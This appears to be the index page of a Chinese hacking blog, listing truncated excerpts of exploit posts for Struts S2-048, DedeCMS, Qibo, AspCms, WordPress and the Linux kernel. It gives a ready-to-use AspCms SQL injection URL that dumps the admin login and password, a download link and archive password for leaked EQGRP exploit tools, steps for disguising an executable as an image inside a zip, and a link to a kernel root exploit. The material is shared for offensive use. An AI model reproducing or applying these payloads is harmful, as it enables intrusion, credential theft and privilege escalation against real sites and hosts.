小马博客

一个无聊的人,一个无聊的博客

验证网站存不存漏洞POC: #!/usr/bin/python #coding=utf-8 ''' s2-048 poc ''' import urllib import urllib2 def post(url, data): req = urllib2.Request(url) ...

发布 2 条评论

GitHub:https://github.com/x0rz/EQGRP_Lost_in_Translation 网盘下载地址:https://yadi.sk/d/NJqzpqo_3GxZA4 解压密码”Reeeeeeeeeeeeeee” Start.jar //图形界面 EXPLODINGCAN 是 IIS 6.0 远程漏洞利用工具 ETERNALROMANCE 是 SMB1 ...

发布 0 条评论

漏洞分析 问题出在wordpress的留言处,通常情况下留言是允许一些html标签的,比如<a>、<B>、<code>等等,然而标签中有一些属性是在白名单里的,比如<a>标签允许href属性,但是onmouseover属性是不允许的。 但...

发布 1 条评论

1.首先我们压缩一个exe可执行文件,是个弹出PWNED的小程序   2.用winrar的zip模式压缩exe文件   3.把压缩的zip文件载入hex软件,找到文件名,更改第二个文件名后缀为 jpg,保存zip文件   4.打开zip,双击里面的图片,将允...

发布 2 条评论

dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前...

发布 3 条评论

0x01_XSS 齐博采用的富文本编辑器为CKeditor,其实本身在其他常见输入点已经做了过滤,但是在fuzz测试的时候发现编辑器在编辑源码提交后未过滤,所以整套系统适用编辑器的地方均可利用。比如短消息处(可指定攻击目标用户) 发布文...

发布 0 条评论

此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 [php]include/dedesql....

发布 24 条评论

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1 ———————————————————————— Powered by As...

发布 0 条评论

国外黑客发现Linux 内核2.6.37-3.8.9版本一个漏洞,成功利用该漏洞可能获得特权用户,还算新鲜,转来给大家看看。比较好用的~ http://fucksheep.org/~sd/warez/semtex.c linux 2.6.37-3.x.x x86_64, ~100 LOC   [php] /* * li...

发布 0 条评论

注: 利用工具可以用任意语言编写其实就是发送漏洞代码就行了。一个request一个response,我尝试用过纯JS PHP JSP JavaSwing JavaFX 现在android版本都快写好了。本来打算发视频和利用工具的不过还是算了吧,懂的人自然就懂了. 演示DE...

发布 0 条评论